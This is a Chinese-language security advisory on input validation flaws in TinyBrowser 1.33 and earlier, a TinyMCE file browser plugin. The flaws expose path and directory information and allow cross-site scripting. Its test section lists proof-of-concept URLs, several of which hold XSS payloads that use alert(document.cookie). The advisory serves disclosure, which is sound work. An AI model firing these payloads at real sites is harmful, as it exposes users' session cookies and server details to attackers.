漏洞起因
输入验证错误
危险等级
中
影响系统
TinyBrowser 1.33及之前版本
不受影响系统
危害
远程攻击者可以利用漏洞获得敏感信息。
攻击所需条件
攻击者必须访问TinyBrowser。
漏洞信息
TinyBrowser是一款基于WEB的应用程序。
TinyBrowser存在多个安全漏洞,允许攻击者提交恶意请求,获得目录列表,软件安装路径信息及存在跨站脚本漏洞,允许攻击者利用漏洞获得敏感信息。
测试方法
http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=
http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=
http://www.example.com/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://www.example.com/site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//
厂商解决方案
目前没有详细解决方案提供:
http://www.lunarvis.com/products/tinymcefilebrowserwithupload.php
漏洞提供者
MustLive
评论关闭。